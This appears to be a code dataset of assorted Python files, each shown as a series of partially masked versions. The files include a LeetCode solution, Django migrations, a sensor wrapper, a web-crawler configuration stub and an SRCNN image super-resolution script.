"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def minWindow(self, s: str, t: str) ->str:\n char_cnt = {}\n for character in t:\n if character not in char_cnt:\n char_cnt[character] = 1\n else:\n char_cnt[character] += 1\n dq = []\n min_substring = None\n for i in range(len(s)):\n if s[i] in t:\n char_cnt[s[i]] -= 1\n dq.append((i, s[i]))\n while len(dq) > 0 and char_cnt[dq[0][1]] < 0:\n char_cnt[dq[0][1]] += 1\n del dq[0]\n containAll = True\n for char in char_cnt:\n if char_cnt[char] > 0:\n containAll = False\n break\n if containAll:\n substring = s[dq[0][0]:dq[-1][0] + 1]\n if min_substring is None or len(substring) < len(\n min_substring):\n min_substring = substring\n return min_substring if min_substring else ''\n",
"step-4": "class Solution:\n def minWindow(self, s: str, t: str) -> str:\n char_cnt = {}\n for character in t:\n if character not in char_cnt:\n char_cnt[character] = 1\n else:\n char_cnt[character] += 1\n\n dq = [] # add index & character\n min_substring = None\n for i in range(len(s)):\n if s[i] in t:\n char_cnt[s[i]] -= 1\n dq.append((i, s[i]))\n while len(dq) > 0 and char_cnt[dq[0][1]] < 0:\n char_cnt[dq[0][1]] += 1\n del dq[0]\n containAll = True\n for char in char_cnt:\n if char_cnt[char] > 0:\n containAll = False\n break\n if containAll:\n substring = s[dq[0][0]:dq[-1][0]+1]\n if min_substring is None or len(substring) < len(min_substring):\n min_substring = substring\n return min_substring if min_substring else \"\"\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Условие
Дано два числа a и b. Выведите гипотенузу треугольника с заданными катетами.
'''
import math
a = int(input())
b = int(input())
print(math.sqrt(a * a + b * b))
|
normal
|
{
"blob_id": "c0348fc5f51e6f7a191fea6d0e3cb84c60b03e22",
"index": 597,
"step-1": "'''\nУсловие\nДано два числа a и b. Выведите гипотенузу треугольника с заданными катетами.\n'''\nimport math\na = int(input())\nb = int(input())\nprint(math.sqrt(a * a + b * b))",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Generated by Django 3.2.3 on 2021-05-29 16:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('login', '0014_auto_20210529_1637'),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('street', models.CharField(blank=True, max_length=255, null=True)),
('postal_code', models.IntegerField(blank=True, null=True)),
('city', models.CharField(blank=True, max_length=255, null=True)),
('country', models.CharField(blank=True, max_length=255, null=True)),
('facility', models.CharField(blank=True, max_length=255, null=True)),
],
),
migrations.CreateModel(
name='StudySession',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_active', models.BooleanField(default=True)),
('start_time', models.TimeField()),
('end_time', models.TimeField()),
('date', models.DateField()),
('available_spots', models.IntegerField(default=1)),
('taken_spots', models.IntegerField(default=0)),
('description', models.CharField(blank=True, max_length=500, null=True)),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.location')),
('subject', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='login.subject')),
],
),
migrations.CreateModel(
name='Participant',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('study_session', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.studysession')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
normal
|
{
"blob_id": "6285d1665bacbff746f44f42ce65981f937fff64",
"index": 4189,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('login', '0014_auto_20210529_1637')]\n operations = [migrations.CreateModel(name='Location', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('street', models.CharField(blank=True,\n max_length=255, null=True)), ('postal_code', models.IntegerField(\n blank=True, null=True)), ('city', models.CharField(blank=True,\n max_length=255, null=True)), ('country', models.CharField(blank=\n True, max_length=255, null=True)), ('facility', models.CharField(\n blank=True, max_length=255, null=True))]), migrations.CreateModel(\n name='StudySession', fields=[('id', models.BigAutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('is_active', models.BooleanField(default=True)), (\n 'start_time', models.TimeField()), ('end_time', models.TimeField()),\n ('date', models.DateField()), ('available_spots', models.\n IntegerField(default=1)), ('taken_spots', models.IntegerField(\n default=0)), ('description', models.CharField(blank=True,\n max_length=500, null=True)), ('location', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to=\n 'study_sessions.location')), ('subject', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='login.subject'))]),\n migrations.CreateModel(name='Participant', fields=[('id', models.\n BigAutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('study_session', models.ForeignKey(on_delete=\n django.db.models.deletion.CASCADE, to='study_sessions.studysession'\n )), ('user', models.ForeignKey(on_delete=django.db.models.deletion.\n CASCADE, to=settings.AUTH_USER_MODEL))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('login', '0014_auto_20210529_1637')]\n operations = [migrations.CreateModel(name='Location', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('street', models.CharField(blank=True,\n max_length=255, null=True)), ('postal_code', models.IntegerField(\n blank=True, null=True)), ('city', models.CharField(blank=True,\n max_length=255, null=True)), ('country', models.CharField(blank=\n True, max_length=255, null=True)), ('facility', models.CharField(\n blank=True, max_length=255, null=True))]), migrations.CreateModel(\n name='StudySession', fields=[('id', models.BigAutoField(\n auto_created=True, primary_key=True, serialize=False, verbose_name=\n 'ID')), ('is_active', models.BooleanField(default=True)), (\n 'start_time', models.TimeField()), ('end_time', models.TimeField()),\n ('date', models.DateField()), ('available_spots', models.\n IntegerField(default=1)), ('taken_spots', models.IntegerField(\n default=0)), ('description', models.CharField(blank=True,\n max_length=500, null=True)), ('location', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to=\n 'study_sessions.location')), ('subject', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='login.subject'))]),\n migrations.CreateModel(name='Participant', fields=[('id', models.\n BigAutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('study_session', models.ForeignKey(on_delete=\n django.db.models.deletion.CASCADE, to='study_sessions.studysession'\n )), ('user', models.ForeignKey(on_delete=django.db.models.deletion.\n CASCADE, to=settings.AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 3.2.3 on 2021-05-29 16:37\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('login', '0014_auto_20210529_1637'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('street', models.CharField(blank=True, max_length=255, null=True)),\n ('postal_code', models.IntegerField(blank=True, null=True)),\n ('city', models.CharField(blank=True, max_length=255, null=True)),\n ('country', models.CharField(blank=True, max_length=255, null=True)),\n ('facility', models.CharField(blank=True, max_length=255, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='StudySession',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('is_active', models.BooleanField(default=True)),\n ('start_time', models.TimeField()),\n ('end_time', models.TimeField()),\n ('date', models.DateField()),\n ('available_spots', models.IntegerField(default=1)),\n ('taken_spots', models.IntegerField(default=0)),\n ('description', models.CharField(blank=True, max_length=500, null=True)),\n ('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.location')),\n ('subject', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='login.subject')),\n ],\n ),\n migrations.CreateModel(\n name='Participant',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('study_session', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study_sessions.studysession')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from allcode.controllers.image_classifiers.image_classifier import ImageClassifier
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog',
'final_prob': .8}
|
normal
|
{
"blob_id": "71fb9dc9f9ac8b1cdbc6af8a859dbc211512b4d1",
"index": 1675,
"step-1": "<mask token>\n\n\nclass ImageClassifierMockup(ImageClassifier):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageClassifierMockup(ImageClassifier):\n <mask token>\n\n def classify_image(self, image):\n return {'final_class': 'dog', 'final_prob': 0.8}\n",
"step-3": "<mask token>\n\n\nclass ImageClassifierMockup(ImageClassifier):\n\n def classify_images(self, images):\n pass\n\n def classify_image(self, image):\n return {'final_class': 'dog', 'final_prob': 0.8}\n",
"step-4": "from allcode.controllers.image_classifiers.image_classifier import ImageClassifier\n\n\nclass ImageClassifierMockup(ImageClassifier):\n\n def classify_images(self, images):\n pass\n\n def classify_image(self, image):\n return {'final_class': 'dog', 'final_prob': 0.8}\n",
"step-5": "from allcode.controllers.image_classifiers.image_classifier import ImageClassifier\n\n\nclass ImageClassifierMockup(ImageClassifier):\n\n def classify_images(self, images):\n pass\n\n def classify_image(self, image):\n return {'final_class': 'dog',\n 'final_prob': .8}\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
my_order = ['spam', 'eggs', 'sausage', 'spam', 'bacon', 'spam']
while 'spam' in my_order:
print("I don't like spam!")
my_order.remove('spam')
print(my_order)
|
normal
|
{
"blob_id": "8e8629dd2d4bb601347694b18d7cb6a94880201d",
"index": 8192,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile 'spam' in my_order:\n print(\"I don't like spam!\")\n my_order.remove('spam')\nprint(my_order)\n",
"step-3": "my_order = ['spam', 'eggs', 'sausage', 'spam', 'bacon', 'spam']\nwhile 'spam' in my_order:\n print(\"I don't like spam!\")\n my_order.remove('spam')\nprint(my_order)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
__author__ = 'changwoncheo'
# -*- coding: utf-8 -*-
import threading
import logging
logging.basicConfig(filename='crawl2.log',level=logging.DEBUG)
class NoParsingFilter(logging.Filter):
def filter(self, record):
msg = record.getMessage()
return not ('Starting' in msg or 'GET' in msg)
logger = logging.getLogger('Crawler')
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.CRITICAL) #로깅 되지 않도록
import os
import re
reobj_album = re.compile('\'(.*)\'')#앨범 정규식 (javascript('숫자'))
reobj_djIndex = re.compile(',\'(.*)\'')#앨범 정규식 (javascript('숫자','숫자'))
reobj_filename = re.compile('/(\w*[.]\w*)$')#파일이름 정규식
category = {102:'발라드',103:'댄스',104:'랩_합합',105:'R&B_Soul',106:'록',107:'일렉트로니카',108:'트로트',109:'포크',110:'인디음악'}
def tapNewlineStrip(str):
return str.encode('utf-8').replace('\n','').replace('\t','').decode('utf-8')
def writeJson(fileName,dict):
import json
print dict
with open(fileName, 'w') as outfile:
json.dump(dict, outfile, ensure_ascii = False, encoding = 'utf-8')
|
normal
|
{
"blob_id": "a52f009a755b45f8ed653a4a0385b1eb667f2318",
"index": 9797,
"step-1": "__author__ = 'changwoncheo'\n# -*- coding: utf-8 -*-\nimport threading\nimport logging\nlogging.basicConfig(filename='crawl2.log',level=logging.DEBUG)\nclass NoParsingFilter(logging.Filter):\n def filter(self, record):\n msg = record.getMessage()\n return not ('Starting' in msg or 'GET' in msg)\nlogger = logging.getLogger('Crawler')\nrequests_log = logging.getLogger(\"requests\")\nrequests_log.setLevel(logging.CRITICAL) #로깅 되지 않도록\n\n\nimport os\nimport re\nreobj_album = re.compile('\\'(.*)\\'')#앨범 정규식 (javascript('숫자'))\nreobj_djIndex = re.compile(',\\'(.*)\\'')#앨범 정규식 (javascript('숫자','숫자'))\nreobj_filename = re.compile('/(\\w*[.]\\w*)$')#파일이름 정규식\ncategory = {102:'발라드',103:'댄스',104:'랩_합합',105:'R&B_Soul',106:'록',107:'일렉트로니카',108:'트로트',109:'포크',110:'인디음악'}\ndef tapNewlineStrip(str):\n return str.encode('utf-8').replace('\\n','').replace('\\t','').decode('utf-8')\n\ndef writeJson(fileName,dict):\n import json\n print dict\n with open(fileName, 'w') as outfile:\n json.dump(dict, outfile, ensure_ascii = False, encoding = 'utf-8')\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import VL53L1X
from sensor_msgs.msg import Range
class _VL53L1():
def __init__(self, address=0x29):
address = int(address, 16)
print("initialising sensor with address: {}".format(hex(address)))
try:
self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)
self.tof.open()
self.tof.start_ranging(0)
self.tof.set_timing(30000, 33)
except Exception as e:
print(e)
def set_range(self, rng):
if rng < 4 and rng >= 0:
self.tof.set_range()
else:
raise Exception("Invalid range: 1 - short, 2 - med, 3 - long")
def set_fov(self, mode):
if mode == "wide":
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
elif mode == "center":
roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)
elif mode == "top":
roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)
elif mode == "bottom":
roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)
elif mode == "left":
roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)
elif mode == "right":
roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)
else:
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
self.tof.set_user_roi(roi)
def read(self):
dist = self.tof.get_distance()
msg = Range()
msg.radiation_type = 1
msg.field_of_view = 27
msg.min_range = 0
msg.max_range = 400
msg.range = float(dist)
return msg
|
normal
|
{
"blob_id": "c6d9b971ab6919846807b740313d450d086ecc23",
"index": 7643,
"step-1": "<mask token>\n\n\nclass _VL53L1:\n <mask token>\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-2": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-3": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-4": "import VL53L1X\nfrom sensor_msgs.msg import Range\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-5": "import VL53L1X\n\nfrom sensor_msgs.msg import Range\n\nclass _VL53L1():\n\n def __init__(self, address=0x29):\n address = int(address, 16)\n print(\"initialising sensor with address: {}\".format(hex(address)))\n \n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0) \n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception(\"Invalid range: 1 - short, 2 - med, 3 - long\")\n\n def set_fov(self, mode):\n\n if mode == \"wide\": \n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n elif mode == \"center\":\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n\n elif mode == \"top\":\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n\n elif mode == \"bottom\":\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n\n elif mode == \"left\":\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n\n elif mode == \"right\":\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n \n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n self.tof.set_user_roi(roi)\n\n def read(self):\n\n dist = self.tof.get_distance()\n \n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n\n return msg ",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('autotasks', '0017_auto_20210210_1512')]
operations = [migrations.AddField(model_name='automatedtask', name=
'run_asap_after_missed', field=models.BooleanField(default=False))]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('autotasks', '0017_auto_20210210_1512')]
operations = [migrations.AddField(model_name='automatedtask', name=
'run_asap_after_missed', field=models.BooleanField(default=False))]
<|reserved_special_token_1|>
# Generated by Django 3.1.7 on 2021-02-24 05:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('autotasks', '0017_auto_20210210_1512'),
]
operations = [
migrations.AddField(
model_name='automatedtask',
name='run_asap_after_missed',
field=models.BooleanField(default=False),
),
]
|
flexible
|
{
"blob_id": "3ab1de77147f6abfabeea10f2a4e85686edffd6f",
"index": 2573,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('autotasks', '0017_auto_20210210_1512')]\n operations = [migrations.AddField(model_name='automatedtask', name=\n 'run_asap_after_missed', field=models.BooleanField(default=False))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('autotasks', '0017_auto_20210210_1512')]\n operations = [migrations.AddField(model_name='automatedtask', name=\n 'run_asap_after_missed', field=models.BooleanField(default=False))]\n",
"step-5": "# Generated by Django 3.1.7 on 2021-02-24 05:37\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('autotasks', '0017_auto_20210210_1512'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='automatedtask',\n name='run_asap_after_missed',\n field=models.BooleanField(default=False),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 17 17:24:39 2020
@author: code
"""
import sys
import keras
import cv2
import numpy
import matplotlib
import skimage
print('Python: {}'.format(sys.version))
print('Numpy: {}'.format(numpy.__version__))
print('Keras: {}'.format(keras.__version__))
print('Matplotlib: {}'.format(matplotlib.__version__))
print('OpenCV: {}'.format(cv2.__version__))
print('Skimage: {}'.format(skimage.__version__))
#import necessary packages
from keras.models import Sequential
from keras.layers import Conv2D, Input
from keras.optimizers import SGD, Adam
from skimage.measure import compare_ssim as ssim
from matplotlib import pyplot as plt
import cv2
import numpy as np
import math
import os
#define A function for peak signal to noise ration(PSNR)
def psnr(target, ref):
#assume RGB/BGR image
target_data = target.astype(float)
ref_data = ref.astype(float)
diff = ref_data - target_data
diff = diff.flatten('C')
rmse = math.sqrt(np.mean(diff ** 2))
return 20*math.log10(255. / rmse)
#define function for mean Squared error(MSE)
def mse(target, ref):
#mse is the sum pf the squared difference between the two image
err = np.sum((target.astype('float'))** 2)
err /= float(target.shape[0] *target.shape[1])
return err
#define function that combines all three image quality metrics
def compare_images(target, ref):
scores = []
scores.append(psnr(target, ref))
scores.append(mse(target, ref))
scores.append(ssim(target, ref, multichannel = True))
return scores
#prepare degraded images by introducing quality distortions via resizing
def prepare_images(path, factor):
#loop throgh filesin the directory
for file in os.listdir(path):
#open the file
img = cv2.imread(path +'/' + file)
#find old and new image dimensions
h, w, c = img.shape
new_height = h / factor
new_width = w / factor
#resize the image -down
img = (cv2.resize(img, (int(new_width), int(new_height)), interpolation = cv2.INTER_LINEAR))
img = (cv2.resize(img, (int(w), int(h)), interpolation = cv2.INTER_LINEAR))
#save the image
print('Saving {}'.format(file))
cv2.imwrite('images//{}'.format(file), img)
prepare_images('source_images/', 2)
#testing the generated images using image quality matrics
for file in os.listdir('images/'):
#open target and reference images
target = cv2.imread('images/{}'.format(file))
ref = cv2.imread('source_images/{}'.format(file))
#calculate the scores
scores = compare_images(target, ref)
#print all three scores
print('{}\nPSNR: {}\nMSE: {}\nSSIM: {}\n'.format(file, scores[0], scores[1], scores[2]))
#define the SRCNN model
def model():
#define the model type
SRCNN = Sequential()
#add model layers
SRCNN.add(Conv2D(filters = 128, kernel_size = (9,9), activation ='relu', padding = 'valid', use_bias = True, input_shape = (None, None, 1)))
SRCNN.add(Conv2D(filters = 64, kernel_size = (3,3), activation ='relu', padding = 'same', use_bias = True ))
SRCNN.add(Conv2D(filters = 1, kernel_size = (5,5), activation ='linear', padding = 'valid', use_bias = True))
#define optimizer
adam = Adam(learning_rate = 0.0003)
#compile model
SRCNN.compile(loss ='mean_squared_error', optimizer = adam, metrics =['mean_squared_error'])
return SRCNN
#define necessary image processing functions
def modcrop(img, scale):
tmpsz = img.shape
sz= tmpsz[0:2]
sz = sz - np.mod(sz, scale)
img = img[0:sz[0], 1:sz[1]]
return img
def shave(image, border):
img = image[border: -border, border: -border]
return img
#define main prediction function
def predict(image_path):
#load the srcnn model with weights
srcnn =model()
srcnn.load_weights('3051crop_weight_200.h5')
#load the degraded and reference images
path, file =os.path.split(image_path)
degraded = cv2.imread(image_path)
ref = cv2.imread('source_images/{}'.format(file))
#preprocess the image with modcrop
ref = modcrop(ref, 3)
degraded = modcrop(degraded, 3)
#convert the image to YCrCb -srcnn trained on Y channel
temp =cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)
#create image slice and normalize
Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype = float)
Y[0, :, :, 0] = temp[:, :, 0].astype(float)/ 255
#perform super resolution with srcnn
pre = srcnn.predict(Y, batch_size = 1)
#post process the output
pre*= 255
pre[pre[:] > 255] = 255
pre[pre[:] < 0] = 0
pre = pre.astype(np.uint8)
#copy Y channel back to image and convert to BGR
temp = shave(temp, 6)
temp[:, :, 0] = pre[0, :, :, 0]
output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)
#remove border from reference and degraded image
ref = shave(ref.astype(np.uint8), 6)
degraded = shave(degraded.astype(np.uint8), 6)
#image quality calculations
scores = []
scores.append(compare_images(degraded, ref))
scores.append(compare_images(output, ref))
#return images and scores
return ref, degraded, output, scores
ref, degraded, output, scores = predict('images/flowers.bmp')
#print all score for all images
print('Degraded Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n'.format(scores[0][0], scores[0][1], scores[0][2]))
print('Reconstructed Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n'.format(scores[1][0], scores[1][1], scores[1][2]))
#display images as subplots
fig, axs = plt.subplots(1, 3, figsize = (20, 8))
axs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))
axs[0].set_title('Original')
axs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))
axs[1].set_title('Degraded')
axs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))
axs[2].set_title('SRCNN')
#remove the x and y tick marks
for ax in axs:
ax.set_xticks([])
ax.set_yticks([])
|
normal
|
{
"blob_id": "e086bebaa166abeea066fe49076f1b007858951f",
"index": 7052,
"step-1": "<mask token>\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\n<mask token>\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef psnr(target, ref):\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n diff = ref_data - target_data\n diff = diff.flatten('C')\n rmse = math.sqrt(np.mean(diff ** 2))\n return 20 * math.log10(255.0 / rmse)\n\n\ndef mse(target, ref):\n err = np.sum(target.astype('float') ** 2)\n err /= float(target.shape[0] * target.shape[1])\n return err\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\n<mask token>\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border:-border, border:-border]\n 